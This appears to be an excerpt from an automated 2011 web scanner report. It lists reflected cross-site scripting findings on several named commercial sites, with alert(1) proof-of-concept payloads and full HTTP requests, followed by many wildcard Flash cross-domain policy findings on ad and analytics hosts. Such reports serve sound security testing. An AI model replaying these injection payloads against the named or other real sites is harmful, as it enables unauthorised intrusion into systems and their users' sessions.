The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3691d"><script>alert(1)</script>633d138c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.151. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.oscommerce-manager.com
Path: /thank-you-purchasing-magneticone-product
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee884"><script>alert(1)</script>9096c38c85d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3183c"><script>alert(1)</script>20375e6ddd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44b2"><script>alert(1)</script>3cf167b5311 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfe33"><script>alert(1)</script>b6c282e0484 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee376"><script>alert(1)</script>241027ec1dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.156. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.oscommerce-manager.com
Path: /themes/oscmanager/images/menu-expanded.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b045"><script>alert(1)</script>29d3f4373d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a5"><script>alert(1)</script>784c4fce844 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e03d8"><script>alert(1)</script>bdf9f240bf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef7d"><script>alert(1)</script>c12fe7265ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e58"><script>alert(1)</script>1331439b8c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.161. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.oscommerce-manager.com
Path: /themes/oscmanager/images/menu-leaf.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 600a9"><script>alert(1)</script>2671288c97c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8cd"><script>alert(1)</script>62cd40caa8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79fc"><script>alert(1)</script>e125c6ed553 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193f0"><script>alert(1)</script>93bc7f90304 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca2f"><script>alert(1)</script>b92bcd436dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7585b"><script>alert(1)</script>549d6025e2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e62"><script>alert(1)</script>0d05b4aca19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bill_addr.country request parameter is copied into the HTML document as plain text between tags. The payload 31035<script>alert(1)</script>2b5d3cef309 was submitted in the bill_addr.country parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bill_addr.state request parameter is copied into the HTML document as plain text between tags. The payload f7cf3<script>alert(1)</script>6fda55ceb90 was submitted in the bill_addr.state parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cc_exp_month request parameter is copied into the HTML document as plain text between tags. The payload e869c<script>alert(1)</script>25983be44dc was submitted in the cc_exp_month parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cc_exp_year request parameter is copied into the HTML document as plain text between tags. The payload e8f2d<script>alert(1)</script>db93a5dd3be was submitted in the cc_exp_year parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the payment_type_def_id request parameter is copied into the HTML document as plain text between tags. The payload 16ef6<script>alert(1)</script>72ff08b81c5 was submitted in the payment_type_def_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ship_addr.country request parameter is copied into the HTML document as plain text between tags. The payload 3889e<script>alert(1)</script>733a0108356 was submitted in the ship_addr.country parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ship_addr.state request parameter is copied into the HTML document as plain text between tags. The payload 6705d<script>alert(1)</script>b68c7b1b8a8 was submitted in the ship_addr.state parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the browid request parameter is copied into the HTML document as plain text between tags. The payload 1e7bc<script>alert(1)</script>0d6eddfe6a6 was submitted in the browid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the livezilla request parameter is copied into the HTML document as plain text between tags. The payload ae77c<script>alert(1)</script>4c049e29410 was submitted in the livezilla parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the start request parameter is copied into the HTML document as plain text between tags. The payload f6044<script>alert(1)</script>ca9b4d96ff2 was submitted in the start parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bgColor request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2298b'><script>alert(1)</script>7b7bb0d95c7 was submitted in the bgColor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /events.php?bgColor=EEEDEA2298b'><script>alert(1)</script>7b7bb0d95c7& HTTP/1.1
Host: www.wiktel.com
Proxy-Connection: keep-alive
Referer: http://www.wiktel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.179. http://www.wiktel.com/events.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wiktel.com
Path: /events.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5a4a'><script>alert(1)</script>036c8c6f9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /events.php?bgColor=EEE/b5a4a'><script>alert(1)</script>036c8c6f9ecDEA& HTTP/1.1
Host: www.wiktel.com
Proxy-Connection: keep-alive
Referer: http://www.wiktel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1349'-alert(1)-'4ed7fdc4ff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getsearchbox.cgi HTTP/1.1
Host: www.yourwebsitevalue.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b1349'-alert(1)-'4ed7fdc4ff1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html> <head> <script language="JavaScript" type="text/javascript"> //Gets the browser specific XmlHttpRequest Object function YWVgetXmlHttpRequestObject() { if (window.XMLHttpRequest) {
The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417f3"-alert(1)-"9bc35301f96 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8c3c"-alert(1)-"57d21297b34 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload c3533<script>alert(1)</script>009f5d08c6b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sun, 15 May 2011 13:59:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload 5513d<script>alert(1)</script>ff2ec5c09da was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload aff8e<script>alert(1)</script>3048c8f55e5 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload 6d280<script>alert(1)</script>864c9da4fc6 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload e1a93<script>alert(1)</script>a601e6228df was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload e2cc3<script>alert(1)</script>a9b554f8c69 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload b2b5b<script>alert(1)</script>949c83499ab9a5e0e was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the physicalzip cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 386bc</script><script>alert(1)</script>cd811f435f3 was submitted in the physicalzip cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the physicalzip cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62653</script><script>alert(1)</script>c7e77554239 was submitted in the physicalzip cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: c.gelifesciences.com
Response
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:18:55 GMT
Server: Omniture DC/2.0.0
xserver: www64
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: cfe713.r.axf8.net
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 13:16:22 GMT
Connection: close
Content-Length: 153
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com
Response
HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 15 May 2011 14:07:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org
Response
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:58:44 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "4c3a05-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: h41174.www4.hp.com
Response
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "66b4b7-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_I41174-IQ_qppm_iuuq=ffffffff0909d79c45525d5f4f58455e445a4a423660;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 15 May 2011 13:18:32 GMT
Connection: close
Content-Length: 225
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: iinet.122.2o7.net
Response
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:32 GMT
Server: Omniture DC/2.0.0
xserver: www297
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: j2global.122.2o7.net
Response
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:31 GMT
Server: Omniture DC/2.0.0
xserver: www63
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 15 May 2011 13:19:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: media.extole.com
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Cache-Control: max-age
Content-Type: text/xml
Date: Sun, 15 May 2011 13:24:35 GMT
Expires: Sun, 22 May 2011 13:24:35 GMT
Last-Modified: Tue, 15 Feb 2011 18:44:08 GMT
Server: nginx/0.7.65
Content-Length: 134
Connection: Close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: met1.hp.com
Response
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:02 GMT
Server: Omniture DC/2.0.0
xserver: www76
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com
Response
HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 15 May 2011 13:16:31 GMT
Connection: keep-alive
Content-Length: 206
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: onebox.extole.com
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 15 May 2011 13:24:17 GMT
Last-Modified: Mon, 02 May 2011 03:48:32 GMT
Server: nginx/0.7.65
X-Bicyclette-Version: 4eccbe41b71d565e704d3bb4e3fb92e57ac165b5
Content-Length: 131
Connection: Close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: pro.hit.gemius.pl
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: r.turn.com
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 15 May 2011 13:17:06 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 15 May 2011 13:17:05 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com
Response
HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 15 May 2011 13:16:29 GMT
Content-Type: text/plain
Content-Length: 81
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: upc.d2.sc.omtrdc.net
Response
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:44 GMT
Server: Omniture DC/2.0.0
xserver: www26
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com
Response
HTTP/1.0 200 OK
Server: Apache (Unix)
